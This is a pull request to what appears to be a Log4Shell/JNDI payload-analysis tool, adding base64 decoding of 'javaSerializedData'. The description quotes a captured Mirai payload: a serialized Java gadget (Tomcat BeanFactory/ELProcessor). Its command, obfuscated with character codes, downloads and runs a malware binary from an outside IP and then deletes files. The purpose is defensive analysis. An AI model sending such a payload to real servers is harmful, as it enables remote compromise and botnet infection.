### PR TITLE
Implemented base64 decoding of javaSerializedData

### DIFF
--- a/payloader.py
+++ b/payloader.py
@@ -56,7 +56,7 @@ def process_payloads(
     elif download_dir and download_class and data.get("javaClassName", None) == "java.lang.String" and \
             data.get("javaSerializedData", None):
         # Base64 decode class serialized in javaSerializedData
-        jsd = data.get("javaSerializedData", "None")
+        jsd = data.get("javaSerializedData", "")
         if re.match(r"[a-zA-Z0-9+/]={0,3}", jsd):
             jsd = base64.b64decode(jsd.encode("ascii"))
             with io.open(new_path, "wb") as handle:


### PR DESCRIPTION
Automatic decoding of serialized java classes, such as Mirai stuff below:

```
{
  ...
  "DN": "o=tomcat",
  "javaClassName": "java.lang.String",
  "javaSerializedData": "rO0ABXNyAB1vcmcuYXBhY2hlLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAHW9yZy5hcGFjaGUubmFtaW5nLkFic3RyYWN0UmVmAAAAAAAAAAECAAB4cgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3Rvcnl0ABJMamF2YS9sYW5nL1N0cmluZztMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgAETAAJY2xhc3NOYW1lcQB+AAR4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgAEeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgAEeHB0AAVzY29wZXQAAHNxAH4AC3QABGF1dGhxAH4AD3NxAH4AC3QACXNpbmdsZXRvbnQABHRydWVzcQB+AAt0AAtmb3JjZVN0cmluZ3QABng9ZXZhbHNxAH4AC3QAAXh0AZd7IiIuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlciIpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCJKYXZhU2NyaXB0IikuZXZhbCgiamF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoU3RyaW5nLmZyb21DaGFyQ29kZSg5OSwxMDAsMzIsNDcsMTE2LDEwOSwxMTIsNTksMzIsMTE5LDEwMywxMDEsMTE2LDMyLDQ5LDU3LDU2LDQ2LDU3LDU2LDQ2LDU0LDQ4LDQ2LDU0LDU1LDQ3LDk4LDEwNSwxMTAsMTE1LDQ3LDEyMCw1Niw1NCw1OSwzMiw5OSwxMDQsMTA5LDExMSwxMDAsMzIsNTUsNTUsNTUsMzIsNDIsNTksMzIsNDYsNDcsMTIwLDU2LDU0LDMyLDEwOCwxMTEsMTAzLDUyLDEwNiw1OSwzMiwxMTQsMTA5LDMyLDQ1LDExNCwxMDIsMzIsNDIpKSIpfXBwcHBweHQAJW9yZy5hcGFjaGUubmFtaW5nLmZhY3RvcnkuQmVhbkZhY3RvcnlwdAAUamF2YXguZWwuRUxQcm9jZXNzb3I=",
  ...
}
```

The data should be decoded and written to a file if enabled. Payload was unfortunately already yeeted and therefore not available for testing anymore.